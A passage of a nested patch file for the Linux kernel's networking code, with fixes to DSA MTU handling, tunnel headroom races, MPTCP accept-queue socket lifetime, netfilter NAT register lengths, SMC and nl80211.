+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index aab79c3552249..6711ddc0a3c7d 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -1899,6 +1899,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 	int new_master_mtu;
+ 	int old_master_mtu;
+ 	int mtu_limit;
++	int overhead;
+ 	int cpu_mtu;
+ 	int err;
+ 
+@@ -1927,9 +1928,10 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 			largest_mtu = slave_mtu;
+ 	}
+ 
+-	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu);
++	overhead = dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu + overhead);
+ 	old_master_mtu = master->mtu;
+-	new_master_mtu = largest_mtu + dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	new_master_mtu = largest_mtu + overhead;
+ 	if (new_master_mtu > mtu_limit)
+ 		return -ERANGE;
+ 
+@@ -1964,8 +1966,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 
+ out_port_failed:
+ 	if (new_master_mtu != old_master_mtu)
+-		dsa_port_mtu_change(cpu_dp, old_master_mtu -
+-				    dsa_tag_protocol_overhead(cpu_dp->tag_ops));
++		dsa_port_mtu_change(cpu_dp, old_master_mtu - overhead);
+ out_cpu_failed:
+ 	if (new_master_mtu != old_master_mtu)
+ 		dev_set_mtu(master, old_master_mtu);
+diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c
+index b5736ef16ed2d..390f4be7f7bec 100644
+--- a/net/ipv4/fib_frontend.c
++++ b/net/ipv4/fib_frontend.c
+@@ -576,6 +576,9 @@ static int rtentry_to_fib_config(struct net *net, int cmd, struct rtentry *rt,
+ 			cfg->fc_scope = RT_SCOPE_UNIVERSE;
+ 	}
+ 
++	if (!cfg->fc_table)
++		cfg->fc_table = RT_TABLE_MAIN;
++
+ 	if (cmd == SIOCDELRT)
+ 		return 0;
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 7a13dd7f546b6..7b05315264b0c 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -828,8 +828,14 @@ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	struct in6_addr addr_any = {};
+ 
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return net_eq(ib2_net(tb), net) && tb->port == port &&
++				tb->l3mdev == l3mdev &&
++				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return net_eq(ib2_net(tb), net) && tb->port == port &&
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index de90b09dfe78f..2541083d49ad6 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -614,10 +614,10 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > dev->needed_headroom)
+-		dev->needed_headroom = headroom;
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
+@@ -800,10 +800,10 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		DEV_STATS_INC(dev, tx_dropped);
+ 		kfree_skb(skb);
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 71d01cf3c13eb..ba839e441450f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3605,7 +3605,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	th->window = htons(min(req->rsk_rcv_wnd, 65535U));
+ 	tcp_options_write(th, NULL, &opts);
+ 	th->doff = (tcp_header_size >> 2);
+-	__TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
++	TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* Okay, we have all we need - do the md5 hash if needed */
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 47b6607a13706..5e80e517f0710 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1240,8 +1240,8 @@ route_lookup:
+ 	 */
+ 	max_headroom = LL_RESERVED_SPACE(dst->dev) + sizeof(struct ipv6hdr)
+ 			+ dst->header_len + t->hlen;
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+ 	err = ip6_tnl_encap(skb, t, &proto, fl6);
+ 	if (err)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index eb0295d900395..fc3fddeb6f36d 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -83,7 +83,7 @@ struct iucv_irq_data {
+ 	u16 ippathid;
+ 	u8  ipflags1;
+ 	u8  iptype;
+-	u32 res2[8];
++	u32 res2[9];
+ };
+ 
+ struct iucv_irq_list {
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 10fe9771a852a..c0c45bf6787d2 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -993,9 +993,13 @@ out:
+ 	return ret;
+ }
+ 
++static struct lock_class_key mptcp_slock_keys[2];
++static struct lock_class_key mptcp_keys[2];
++
+ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 					    struct mptcp_pm_addr_entry *entry)
+ {
++	bool is_ipv6 = sk->sk_family == AF_INET6;
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+ 	struct socket *ssock;
+@@ -1012,6 +1016,18 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (!newsk)
+ 		return -EINVAL;
+ 
++	/* The subflow socket lock is acquired in a nested to the msk one
++	 * in several places, even by the TCP stack, and this msk is a kernel
++	 * socket: lockdep complains. Instead of propagating the _nested
++	 * modifiers in several places, re-init the lock class for the msk
++	 * socket to an mptcp specific one.
++	 */
++	sock_lock_init_class_and_name(newsk,
++				      is_ipv6 ? "mlock-AF_INET6" : "mlock-AF_INET",
++				      &mptcp_slock_keys[is_ipv6],
++				      is_ipv6 ? "msk_lock-AF_INET6" : "msk_lock-AF_INET",
++				      &mptcp_keys[is_ipv6]);
++
+ 	lock_sock(newsk);
+ 	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
+ 	release_sock(newsk);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index bc6c1f62a6905..6c2577b93fd80 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -825,7 +825,6 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	if (sk->sk_socket && !ssk->sk_socket)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+-	mptcp_propagate_sndbuf((struct sock *)msk, ssk);
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	return true;
+ }
+@@ -2344,7 +2343,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out;
+ 	}
+ 
+-	sock_orphan(ssk);
+ 	subflow->disposable = 1;
+ 
+ 	/* if ssk hit tcp_done(), tcp_cleanup_ulp() cleared the related ops
+@@ -2352,15 +2350,25 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	 * reference owned by msk;
+ 	 */
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
++		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
++	} else if (msk->in_accept_queue && msk->first == ssk) {
++		/* if the first subflow moved to a close state, e.g. due to
++		 * incoming reset and we reach here before inet_child_forget()
++		 * the TCP stack could later try to close it via
++		 * inet_csk_listen_stop(), or deliver it to the user space via
++		 * accept().
++		 * We can't delete the subflow - or risk a double free - nor let
++		 * the msk survive - or will be leaked in the non accept scenario:
++		 * fallback and let TCP cope with the subflow cleanup.
++		 */
++		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
++		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
++		if (ssk->sk_state == TCP_LISTEN)
+ 			mptcp_event_pm_listener(ssk, MPTCP_EVENT_LISTENER_CLOSED);
+-		}
++
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2400,9 +2408,10 @@ static unsigned int mptcp_sync_mss(struct sock *sk, u32 pmtu)
+ 	return 0;
+ }
+ 
+-static void __mptcp_close_subflow(struct mptcp_sock *msk)
++static void __mptcp_close_subflow(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow, *tmp;
++	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	might_sleep();
+ 
+@@ -2416,7 +2425,15 @@ static void __mptcp_close_subflow(struct mptcp_sock *msk)
+ 		if (!skb_queue_empty_lockless(&ssk->sk_receive_queue))
+ 			continue;
+ 
+-		mptcp_close_ssk((struct sock *)msk, ssk, subflow);
++		mptcp_close_ssk(sk, ssk, subflow);
++	}
++
++	/* if the MPC subflow has been closed before the msk is accepted,
++	 * msk will never be accept-ed, close it now
++	 */
++	if (!msk->first && msk->in_accept_queue) {
++		sock_set_flag(sk, SOCK_DEAD);
++		inet_sk_state_store(sk, TCP_CLOSE);
+ 	}
+ }
+ 
+@@ -2625,6 +2642,9 @@ static void mptcp_worker(struct work_struct *work)
+ 	__mptcp_check_send_data_fin(sk);
+ 	mptcp_check_data_fin(sk);
+ 
++	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		__mptcp_close_subflow(sk);
++
+ 	/* There is no point in keeping around an orphaned sk timedout or
+ 	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+@@ -2640,9 +2660,6 @@ static void mptcp_worker(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		__mptcp_close_subflow(msk);
+-
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+ 		__mptcp_retrans(sk);
+ 
+@@ -3073,6 +3090,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+ 	msk->subflow = NULL;
++	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+ 		WRITE_ONCE(msk->csum_enabled, true);
+@@ -3090,8 +3108,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	security_inet_csk_clone(nsk, req);
+ 	bh_unlock_sock(nsk);
+ 
+-	/* keep a single reference */
+-	__sock_put(nsk);
++	/* note: the newly allocated socket refcount is 2 now */
+ 	return nsk;
+ }
+ 
+@@ -3147,8 +3164,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 			goto out;
+ 		}
+ 
+-		/* acquire the 2nd reference for the owning socket */
+-		sock_hold(new_mptcp_sock);
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+ 	} else {
+@@ -3696,25 +3711,10 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 		struct sock *newsk = newsock->sk;
+ 
+ 		set_bit(SOCK_CUSTOM_SOCKOPT, &newsock->flags);
++		msk->in_accept_queue = 0;
+ 
+ 		lock_sock(newsk);
+ 
+-		/* PM/worker can now acquire the first subflow socket
+-		 * lock without racing with listener queue cleanup,
+-		 * we can notify it, if needed.
+-		 *
+-		 * Even if remote has reset the initial subflow by now
+-		 * the refcnt is still at least one.
+-		 */
+-		subflow = mptcp_subflow_ctx(msk->first);
+-		list_add(&subflow->node, &msk->conn_list);
+-		sock_hold(msk->first);
+-		if (mptcp_is_fully_established(newsk))
+-			mptcp_pm_fully_established(msk, msk->first, GFP_KERNEL);
+-
+-		mptcp_rcv_space_init(msk, msk->first);
+-		mptcp_propagate_sndbuf(newsk, msk->first);
+-
+ 		/* set ssk->sk_socket of accept()ed flows to mptcp socket.
+ 		 * This is needed so NOSPACE flag can be set from tcp stack.
+ 		 */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 601469249da80..644cf0686f341 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -295,7 +295,8 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			fastopening:1;
++			fastopening:1,
++			in_accept_queue:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -628,7 +629,6 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+@@ -666,6 +666,8 @@ void mptcp_subflow_set_active(struct mptcp_subflow_context *subflow);
+ 
+ bool mptcp_subflow_active(struct mptcp_subflow_context *subflow);
+ 
++void mptcp_subflow_drop_ctx(struct sock *ssk);
++
+ static inline void mptcp_subflow_tcp_fallback(struct sock *sk,
+ 					      struct mptcp_subflow_context *ctx)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 32904c76c6a17..8f6e48e5db2ce 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -396,10 +396,15 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
++	/* mptcp_mp_fail_no_response() can reach here on an already closed
++	 * socket
++	 */
++	if (ssk->sk_state == TCP_CLOSE)
++		return;
++
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+ 	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+@@ -621,7 +626,7 @@ static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+-static struct proto tcpv6_prot_override;
++static struct proto tcpv6_prot_override __ro_after_init;
+ 
+ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+@@ -692,9 +697,10 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 
+ static void mptcp_force_close(struct sock *sk)
+ {
+-	/* the msk is not yet exposed to user-space */
++	/* the msk is not yet exposed to user-space, and refcount is 2 */
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 	sk_common_release(sk);
++	sock_put(sk);
+ }
+ 
+ static void subflow_ulp_fallback(struct sock *sk,
+@@ -710,7 +716,7 @@ static void subflow_ulp_fallback(struct sock *sk,
+ 	mptcp_subflow_ops_undo_override(sk);
+ }
+ 
+-static void subflow_drop_ctx(struct sock *ssk)
++void mptcp_subflow_drop_ctx(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *ctx = mptcp_subflow_ctx(ssk);
+ 
+@@ -749,6 +755,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+ 	struct sock *new_msk = NULL;
++	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+ 	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
+@@ -815,7 +822,7 @@ create_child:
+ 
+ 			if (new_msk)
+ 				mptcp_copy_inaddrs(new_msk, child);
+-			subflow_drop_ctx(child);
++			mptcp_subflow_drop_ctx(child);
+ 			goto out;
+ 		}
+ 
+@@ -823,6 +830,8 @@ create_child:
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
++			owner = mptcp_sk(new_msk);
++
+ 			/* this can't race with mptcp_close(), as the msk is
+ 			 * not yet exposted to user-space
+ 			 */
+@@ -831,14 +840,14 @@ create_child:
+ 			/* record the newly created socket as the first msk
+ 			 * subflow, but don't link it yet into conn_list
+ 			 */
+-			WRITE_ONCE(mptcp_sk(new_msk)->first, child);
++			WRITE_ONCE(owner->first, child);
+ 
+ 			/* new mpc subflow takes ownership of the newly
+ 			 * created mptcp socket
+ 			 */
+ 			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
+-			mptcp_pm_new_connection(mptcp_sk(new_msk), child, 1);
+-			mptcp_token_accept(subflow_req, mptcp_sk(new_msk));
++			mptcp_pm_new_connection(owner, child, 1);
++			mptcp_token_accept(subflow_req, owner);
+ 			ctx->conn = new_msk;
+ 			new_msk = NULL;
+ 
+@@ -846,15 +855,21 @@ create_child:
+ 			 * uses the correct data
+ 			 */
+ 			mptcp_copy_inaddrs(ctx->conn, child);
++			mptcp_propagate_sndbuf(ctx->conn, child);
++
++			mptcp_rcv_space_init(owner, child);
++			list_add(&ctx->node, &owner->conn_list);
++			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+ 			 */
+-			if (mp_opt.suboptions & OPTION_MPTCP_MPC_ACK)
++			if (mp_opt.suboptions & OPTION_MPTCP_MPC_ACK) {
+ 				mptcp_subflow_fully_established(ctx, &mp_opt);
++				mptcp_pm_fully_established(owner, child, GFP_ATOMIC);
++				ctx->pm_notified = 1;
++			}
+ 		} else if (ctx->mp_join) {
+-			struct mptcp_sock *owner;
+-
+ 			owner = subflow_req->msk;
+ 			if (!owner) {
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EPROHIBIT);
+@@ -898,7 +913,7 @@ out:
+ 	return child;
+ 
+ dispose_child:
+-	subflow_drop_ctx(child);
++	mptcp_subflow_drop_ctx(child);
+ 	tcp_rsk(req)->drop_req = true;
+ 	inet_csk_prepare_for_destroy_sock(child);
+ 	tcp_done(child);
+@@ -909,7 +924,7 @@ dispose_child:
+ }
+ 
+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+-static struct proto tcp_prot_override;
++static struct proto tcp_prot_override __ro_after_init;
+ 
+ enum mapping_status {
+ 	MAPPING_OK,
+@@ -1431,6 +1446,13 @@ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+ 
++	/* bail early if this is a no-op, so that we avoid introducing a
++	 * problematic lockdep dependency between TCP accept queue lock
++	 * and msk socket spinlock
++	 */
++	if (!sk->sk_socket)
++		return;
++
+ 	mptcp_data_lock(sk);
+ 	if (!sock_owned_by_user(sk))
+ 		__mptcp_error_report(sk);
+@@ -1800,79 +1822,6 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+-{
+-	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-
+-	/* build a list of all unaccepted mptcp sockets */
+-	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
+-		struct mptcp_sock *msk;
+-
+-		if (!sk_is_mptcp(ssk))
+-			continue;
+-
+-		subflow = mptcp_subflow_ctx(ssk);
+-		if (!subflow || !subflow->conn)
+-			continue;
+-
+-		/* skip if already in list */
+-		msk = mptcp_sk(subflow->conn);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		struct sock *sk = (struct sock *)msk;
+-		bool do_cancel_work;
+-
+-		sock_hold(sk);
+-		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->first = NULL;
+-		msk->dl_next = NULL;
+-
+-		do_cancel_work = __mptcp_close(sk, 0);
+-		release_sock(sk);
+-		if (do_cancel_work) {
+-			/* lockdep will report a false positive ABBA deadlock
+-			 * between cancel_work_sync and the listener socket.
+-			 * The involved locks belong to different sockets WRT
+-			 * the existing AB chain.
+-			 * Using a per socket key is problematic as key
+-			 * deregistration requires process context and must be
+-			 * performed at socket disposal time, in atomic
+-			 * context.
+-			 * Just tell lockdep to consider the listener socket
+-			 * released here.
+-			 */
+-			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+-			mptcp_cancel_work(sk);
+-			mutex_acquire(&listener_sk->sk_lock.dep_map,
+-				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
+-		}
+-		sock_put(sk);
+-	}
+-
+-	/* we are still under the listener msk socket lock */
+-	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
+-}
+-
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+@@ -1929,6 +1878,13 @@ static void subflow_ulp_release(struct sock *ssk)
+ 		 * when the subflow is still unaccepted
+ 		 */
+ 		release = ctx->disposable || list_empty(&ctx->node);
++
++		/* inet_child_forget() does not call sk_state_change(),
++		 * explicitly trigger the socket close machinery
++		 */
++		if (!release && !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW,
++						  &mptcp_sk(sk)->flags))
++			mptcp_schedule_work(sk);
+ 		sock_put(sk);
+ 	}
+ 
+diff --git a/net/netfilter/nft_masq.c b/net/netfilter/nft_masq.c
+index e55e455275c48..9544c2f16998b 100644
+--- a/net/netfilter/nft_masq.c
++++ b/net/netfilter/nft_masq.c
+@@ -43,7 +43,7 @@ static int nft_masq_init(const struct nft_ctx *ctx,
+ 			 const struct nft_expr *expr,
+ 			 const struct nlattr * const tb[])
+ {
+-	u32 plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	u32 plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	struct nft_masq *priv = nft_expr_priv(expr);
+ 	int err;
+ 
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
+index 0479991503900..5c29915ab0289 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -226,7 +226,7 @@ static int nft_nat_init(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 		priv->flags |= NF_NAT_RANGE_MAP_IPS;
+ 	}
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_NAT_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_NAT_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5f77399875593..67cec56bc84a3 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -48,7 +48,7 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 	unsigned int plen;
+ 	int err;
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_REDIR_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_REDIR_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+@@ -236,7 +236,7 @@ static struct nft_expr_type nft_redir_inet_type __read_mostly = {
+ 	.name		= "redir",
+ 	.ops		= &nft_redir_inet_ops,
+ 	.policy		= nft_redir_policy,
+-	.maxattr	= NFTA_MASQ_MAX,
++	.maxattr	= NFTA_REDIR_MAX,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 53f63bfbaf5f9..89105e95b4523 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -114,6 +114,9 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
++	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
++		return -ENOBUFS;
++
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c19d4b7c1f28a..0208dfb353456 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1459,7 +1459,7 @@ static void __smc_lgr_terminate(struct smc_link_group *lgr, bool soft)
+ 	if (lgr->terminating)
+ 		return;	/* lgr already terminating */
+ 	/* cancel free_work sync, will terminate when lgr->freeing is set */
+-	cancel_delayed_work_sync(&lgr->free_work);
++	cancel_delayed_work(&lgr->free_work);
+ 	lgr->terminating = 1;
+ 
+ 	/* kill remaining link group connections */
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 02b9a0280896c..e34491e63133d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8816,7 +8816,7 @@ static bool cfg80211_off_channel_oper_allowed(struct wireless_dev *wdev,
+ 		struct cfg80211_chan_def *chandef;
+ 
+ 		chandef = wdev_chandef(wdev, link_id);
+-		if (!chandef)
++		if (!chandef || !chandef->chan)
+ 			continue;
+ 
+ 		/*
+@@ -10700,8 +10700,7 @@ static int nl80211_crypto_settings(struct cfg80211_registered_device *rdev,
+ 
+ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device *rdev,
+ 					      const u8 *ssid, int ssid_len,
+-					      struct nlattr **attrs,
+-					      const u8 **bssid_out)
++					      struct nlattr **attrs)
+ {
+ 	struct ieee80211_channel *chan;
+ 	struct cfg80211_bss *bss;
+@@ -10728,7 +10727,6 @@ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device
+ 	if (!bss)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	*bssid_out = bssid;
+ 	return bss;
+ }
+ 
+@@ -10738,7 +10736,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct cfg80211_assoc_request req = {};
+ 	struct nlattr **attrs = NULL;
+-	const u8 *bssid, *ssid;
++	const u8 *ap_addr, *ssid;
+ 	unsigned int link_id;
+ 	int err, ssid_len;
+ 
+@@ -10875,6 +10873,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			return -EINVAL;
+ 
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		ap_addr = req.ap_mld_addr;
+ 
+ 		attrs = kzalloc(attrsize, GFP_KERNEL);
+ 		if (!attrs)
+@@ -10900,8 +10899,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 				goto free;
+ 			}
+ 			req.links[link_id].bss =
+-				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs,
+-						  &bssid);
++				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs);
+ 			if (IS_ERR(req.links[link_id].bss)) {
+ 				err = PTR_ERR(req.links[link_id].bss);
+ 				req.links[link_id].bss = NULL;
+@@ -10952,10 +10950,10 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
